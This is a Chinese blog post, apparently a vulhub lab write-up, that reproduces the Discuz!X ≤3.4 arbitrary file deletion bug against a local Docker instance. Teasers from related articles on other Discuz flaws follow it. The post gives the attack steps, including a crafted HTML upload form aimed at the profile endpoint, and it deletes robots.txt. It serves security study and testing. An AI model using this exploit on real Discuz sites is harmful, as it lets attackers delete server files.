Discuz 3.x 任意文件删除漏洞复现

最新推荐文章于 2022-05-10 14:01:35 发布
最新推荐文章于 2022-05-10 14:01:35 发布
阅读量2.4k 收藏 3
点赞数 1
分类专栏: vulhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41048303/article/details/121751402
版权
本文详细介绍了Discuz!X 3.4版本中存在的任意文件删除漏洞,通过环境搭建、漏洞复现步骤展示了如何利用此漏洞删除指定文件。用户注册并获取formhash后,通过构造特殊的HTML表单并上传图片,可以触发文件删除操作,影响系统安全。参考链接提供了更多相关信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Discuz!X ≤3.4 任意文件删除漏洞

1.漏洞环境

执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz
在这里插入图片描述

2.漏洞复现

  • 访问http://192.168.1.142/robots.txt可见robots.txt是存在的
    在这里插入图片描述

  • 注册用户hahaha
    在这里插入图片描述

  • 在个人设置页面找到自己的formhash
    在这里插入图片描述

  • 带上自己的Cookie、formhash发送如下数据包
    在这里插入图片描述

  • 查看个人设置页面的出生地
    在这里插入图片描述

  • 构造upload.html,写上自己的formhash

    <body>
    <form action="http://192.168.1.142/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=
[formhash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

    用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。

    再次访问http://your-ip/robots.txt,发现文件成功被删除:
    在这里插入图片描述

参考连接 https://vulhub.org/#/environments/discuz/x3.4-arbitrary-file-deletion/

Discuz!X 3.4任意文件删除漏洞
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
10-05 882
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 4119
0X1 漏洞概述 2019年7月11日,网络上出现了一个Discuz!ML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3Discuz...
DiscuzX ≤3.4 任意文件删除漏洞
zizizizizi_的博客
01-17 2856
Discuz!X ≤3.4 任意文件删除漏洞 一、漏洞思路 通过配置个人信息的属性值,删除任意文件 版本 :discuz <= 3.4 二、漏洞复现 1.安装数据库 2.查看robots文件,发现文件存在 3.注册登录,进入设置界面 4.找到formhash值并记录 5.点击保存 ,bp拦截 发送如下 ...
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 1036
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz!X ≤3.4 任意文件删除漏洞 漏洞复现
ADummy的博客
02-05 1514
Discuz!X ≤3.4 任意文件删除漏洞 by ADummy 0x00利用路线 ​ Discuz个人设置界面—>burpsuite抓包改包—>上传文件替换脏数据—>导致文件删除 0x01漏洞介绍 ​ 通过配置个人信息的属性值,导致文件删除。 ​ 影响版本 Discuz <= 3.4 0x02漏洞复现 ​ 安装Discuz,数据库地址为db ​ 查看robots文件,此时文件存在 ​ 登录,并进去设置页面,点击保存并抓包,formhash值记一下。
Discuz!X ≤3.4 任意文件删除漏洞
EC_Carrot的博客
05-25 440
直接复现 访问robots.txt,发现是存在该文件的,这次目标便是它! 首先随便创个用户,然后在个人设置界面找到自己的formhash与cookie 然后发送如下数据包: POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1 Host: localhost Content-Length: 367 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type:
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3355
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
Discuz快照被劫持:DZ被挂马常被利用漏洞都在这
lixon166的博客
02-23 1740
0x00 网站快照劫持:DZ常见漏洞利用分析 0x01Discuz上传图片附件实现远程命令执行漏洞 漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。 通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。前台登录发贴上传图片附件。 提示:forum.php是常被利用的文...
漏洞分析】Discuz X3.3补丁安全分析
vspiders的博客
08-26 2540
0x01 漏洞分析 漏洞发生在页面/upload/source/admincp/admincp_setting.php页面,看源码 $settingnew = $_GET['settingnew']; if($operation == 'credits') { $extcredits_exists = 0; foreach($settingnew['extcredits'] as
dz文件cp.php,Discuz!X ≤3.4 任意文件删除漏洞分析
weixin_39692254的博客
04-06 422
作者:LoRexxar’@知道创宇404实验室日期:2017年9月30日0x01 简述Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇4...
Discuz !ML V3.X漏洞复现
Seizerz的博客
07-18 1175
前言:前些天一直在学习新知识,今天抽空做个文档整理,记录下学习情况。 废话不多说,正文开始。 0X01 漏洞介绍 2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。 本次漏洞是由于Discuz! ML对于cookie字段的不...
dz x3 html,Discuz x3.4前台SSRF漏洞分析
weixin_30346025的博客
07-01 934
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言2018年12月3日,@L3mOn公开了一个Discuz x3.4版本的前台SSRF,通过利用一个二次跳转加上两个解析问题,可以巧妙地完成SSRF攻击链。在和小伙伴@Dawu复现过程中发现漏洞本身依赖多个特性,导致可利用环境各种缩减和部分条件的强依赖关系大大减小了该漏洞的危害。后...
Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)
weixin_33774883的博客
10-01 451
  今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程。结尾附上自己编写的python脚本,自动化实现任意文件删除。 具体漏洞,请查看 https://paper.seebug.org/411/ 0x01 环境搭建   到官网下载Discuz 3.4版本,phpstudy 本机搭建,并注册账号。站点根目录新建11...
Discuz!ML 3.x任意代码执行漏洞
logan_logan的博客
07-29 1868
1.简介 影响系统及版本:Discuz!ML V3.2-3.4 漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 2.环境搭建 网站环境:phpstudy_pro DisCuz版本:3.4 PHP版本:php5.4.45nts Apache版本:2.4.39 Mysql版本:5.7.26 3.Discuz安装 将源码复制到网站根目录下; 在网页输入地址打开安装界面,然后一直下一步就ok了; 4.漏洞复现 用火狐浏览器打开,
Discuz!X 3.4 前台任意文件删除漏洞复现
weixin_30399155的博客
10-11 629
Discuz!X 3.4 前台任意文件删除漏洞复现 参考链接: http://www.freebuf.com/vuls/149904.html http://www.freebuf.com/articles/system/149810.html http://mp.weixin.qq.com/s?srcid=0930uM1OtfeAsXwHRrfZBIyo&scene=23&...
Discuz!x3.2-3.4 登陆错误次数永远4次bug修复(高危漏洞
无限星辰的博客
06-30 1200
漏洞详情 在 Discuz! X3.2 Release 20141225 版本以及同期发布的 UCenter 软件中,开发了一个部分生效的 “允许用户登录失败次数” 功能,但此功能未完整开发之后仅仅注释了界面上的功能项,后续版本也没有继续开发,导致部分站点的 login_failedtime 在 UCenter 后台基本设置处保存时被设置成 0 ,而由于不同功能项对 0 的处理方式有差异导致系统内对此情况的处理手段是不记录登录失败次数而在提示信息中固定返回 4 次,导致漏洞发生,所以如果你的网站输错密码不管
php漏洞站点复现,Discuz!ML 3.x任意代码执行漏洞之大佬分析之后我分析
weixin_33730916的博客
03-20 446
原标题:Discuz!ML 3.x任意代码执行漏洞之大佬分析之后我分析首先附上米斯特安全大佬们文章的链接,刚开始有些东西我没看的太懂,于是我就再添了点东西,希望像我一样的小白也能看懂。一、漏洞综述漏洞类型:代码执行漏洞影响系统及版本:Discuz!ML V3.2-3.4漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。二...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值